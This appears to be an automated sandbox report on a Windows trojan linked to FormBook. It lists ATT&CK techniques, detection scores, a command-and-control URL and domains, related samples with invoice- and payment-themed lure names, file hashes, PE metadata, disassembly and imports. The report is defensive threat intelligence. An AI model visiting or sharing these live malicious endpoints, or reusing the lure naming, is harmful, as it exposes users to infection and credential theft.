Source: Yara match	File source: 00000002.00000002.2352214386.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_00278C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00278C4F
Source: C:\Users\user\Desktop\WDpjhC3jpq.exe	Code function: 0_2_0027923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0027923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
WDpjhC3jpq.exe	67%	Virustotal		Browse
WDpjhC3jpq.exe	79%	ReversingLabs	Win32.Trojan.AutoitInject
WDpjhC3jpq.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://www.39978.club/4bhh/?AL=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=&LNB=hTLpR848	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtml.huksa.huhusddfnsuegcdn.com	23.167.152.41	true	false		high
www.39978.club	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.39978.club/4bhh/?AL=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnsbSmi+QanCgKDCOHomg85rhBTVZOXML7PcqWYx+hLfm17lEWK4=&LNB=hTLpR848	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://ac.ecosia.org/autocomplete?q=	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	find.exe, 00000004.00000002.2594481168.00000000080DE000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.167.152.41	gtml.huksa.huhusddfnsuegcdn.com	Reserved		395774	ESVC-ASNUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587604
Start date and time:	2025-01-10 15:33:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WDpjhC3jpq.exe renamed because original name is a hash value
Original Sample Name:	4e6c9d7c31e90e59eb78c12bbd39d9e08791bc187f56f8a82c1104ae5bb1ff36.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@1/1
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 52 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.253.45, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target BrwYqDqbrpK.exe, PID 6752 because it is empty
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.167.152.41	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.75178.club/a4h7/?xP7x=PP6GFaOQILwxi5diAyqRnR0HCUuPn1KM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQKmR9Tyuvz8OKoog24WuNruFHA9eSGHCBo40=&F4=Q0yHy
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	www.75178.club/q34f/
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	www.06753.photo/4i55/
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	www.75178.club/q34f/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.75178.club/a4h7/
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	www.75178.club/q34f/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.75178.club/a4h7/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gtml.huksa.huhusddfnsuegcdn.com	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	New quotation request.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Invoice 10493.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	HUEtVS3MQe.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	23.167.152.41

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ESVC-ASNUS	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	01152-11-12-24.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	DRAFT COPY BL, CI & PL.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	New quotation request.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	23.167.152.41
	need quotations.exe	Get hash	malicious	FormBook	Browse	23.167.152.41

Process:	C:\Windows\SysWOW64\find.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut912D.tmp

Download File

Process:	C:\Users\user\Desktop\WDpjhC3jpq.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995302496788963
Encrypted:	true
SSDEEP:	6144:O0w70N73oZPBFOFhHqvN0NtpJTlprFbyocpvmvuTDFckNF:OA3oZPrshHqvStrlxFbyocgvEDRF
MD5:	A7E69EE52310BD9B7805C4E89FB9AE41
SHA1:	746550F4B6A930BB256C9A1623FB87A0B9F4D2CC
SHA-256:	54D8A8691C4687257F00E9A3C922047801A4B0F65A95B9919884D7BBED734B39
SHA-512:	A0DDEB75799E7B240C64F45A61A142DDF84B4CBFDEA8D5570BCCC6AAD84266A24623D28B3B1ADC76614F50D1E84DF6A2A86869D80F779217BB2E2A6B341B9F1C
Malicious:	false
Reputation:	low
Preview:	..\|b.UBGD...Y......VJ....Y:..VUBGDM7GPF4T10FVIW4LWZ2R90VUBG.M7G^Y.Z1.O.h.5..{f:PCv%0(#?Vp%U:__2v+2.>"4.;W....g)"S"~K9^.0FVIW4L.[;..P1..'#..'7....\|6.......2^.L..x-P../W<.P!.IW4LWZ2RiuVU.FEM....4T10FVIW.LU[9S20V.FGDM7GPF4TQ$FVIG4LW6R90.UBWDM7EPF2T10FVIW2LWZ2R90V%FGDO7GPF4T30..IW$LWJ2R90FUBWDM7GPF$T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T.D#.=W4L..6R9 VUB.@M7WPF4T10FVIW4LWZ.R9PVUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7G

C:\Users\user\AppData\Local\Temp\extrorsal

Download File

Process:	C:\Users\user\Desktop\WDpjhC3jpq.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.995302496788963
Encrypted:	true
SSDEEP:	6144:O0w70N73oZPBFOFhHqvN0NtpJTlprFbyocpvmvuTDFckNF:OA3oZPrshHqvStrlxFbyocgvEDRF
MD5:	A7E69EE52310BD9B7805C4E89FB9AE41
SHA1:	746550F4B6A930BB256C9A1623FB87A0B9F4D2CC
SHA-256:	54D8A8691C4687257F00E9A3C922047801A4B0F65A95B9919884D7BBED734B39
SHA-512:	A0DDEB75799E7B240C64F45A61A142DDF84B4CBFDEA8D5570BCCC6AAD84266A24623D28B3B1ADC76614F50D1E84DF6A2A86869D80F779217BB2E2A6B341B9F1C
Malicious:	false
Reputation:	low
Preview:	..\|b.UBGD...Y......VJ....Y:..VUBGDM7GPF4T10FVIW4LWZ2R90VUBG.M7G^Y.Z1.O.h.5..{f:PCv%0(#?Vp%U:__2v+2.>"4.;W....g)"S"~K9^.0FVIW4L.[;..P1..'#..'7....\|6.......2^.L..x-P../W<.P!.IW4LWZ2RiuVU.FEM....4T10FVIW.LU[9S20V.FGDM7GPF4TQ$FVIG4LW6R90.UBWDM7EPF2T10FVIW2LWZ2R90V%FGDO7GPF4T30..IW$LWJ2R90FUBWDM7GPF$T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T.D#.=W4L..6R9 VUB.@M7WPF4T10FVIW4LWZ.R9PVUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7GPF4T10FVIW4LWZ2R90VUBGDM7G

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.146014679279089
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WDpjhC3jpq.exe
File size:	1'212'928 bytes
MD5:	e11751145ed9153735f2bfefd5a2ce9e
SHA1:	36d603e7529906f247b5ab3d0f78f153511669cd
SHA256:	4e6c9d7c31e90e59eb78c12bbd39d9e08791bc187f56f8a82c1104ae5bb1ff36
SHA512:	8992eee952ef4dd71e8add5d130cdc0e700fb44e84fd85ca0ed30094835f573342837dfa48902ef576c4b05ce60f573883fba5f3dceb632f58f0151e2e4b55c9
SSDEEP:	24576:Wtb20pkaCqT5TBWgNQ7aa1eBZ6lBG/720ri18ed6A:DVg5tQ7aa1eBZ6264iOO5
TLSH:	0C45D01273DE8360C3B25273BA25BB01BE7F782506B5F56B2FD4093DE920162525EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67465959 [Tue Nov 26 23:27:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F28A0D9C04Fh
jmp 00007F28A0D8F064h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F28A0D8F1EAh
cmp edi, eax
jc 00007F28A0D8F54Eh
bt dword ptr [004C0158h], 01h
jnc 00007F28A0D8F1E9h
rep movsb
jmp 00007F28A0D8F4FCh
cmp ecx, 00000080h
jc 00007F28A0D8F3B4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F28A0D8F1F0h
bt dword ptr [004BA370h], 01h
jc 00007F28A0D8F6C0h
bt dword ptr [004C0158h], 00000000h
jnc 00007F28A0D8F38Dh
test edi, 00000003h
jne 00007F28A0D8F39Eh
test esi, 00000003h
jne 00007F28A0D8F37Dh
bt edi, 02h
jnc 00007F28A0D8F1EFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F28A0D8F1F3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F28A0D8F245h
bt esi, 03h
jnc 00007F28A0D8F298h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x5f0c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x124000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x5f0c0	0x5f200	c20f58c694a3233706d2b80e3a425d7c	False	0.9307988050262812	data	7.900741316294311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x124000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x563c7	data			1.0003284044357248
RT_GROUP_ICON	0x122b80	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x122bf8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x122c0c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x122c20	0x14	data	English	Great Britain	1.25
RT_VERSION	0x122c34	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x122d10	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, 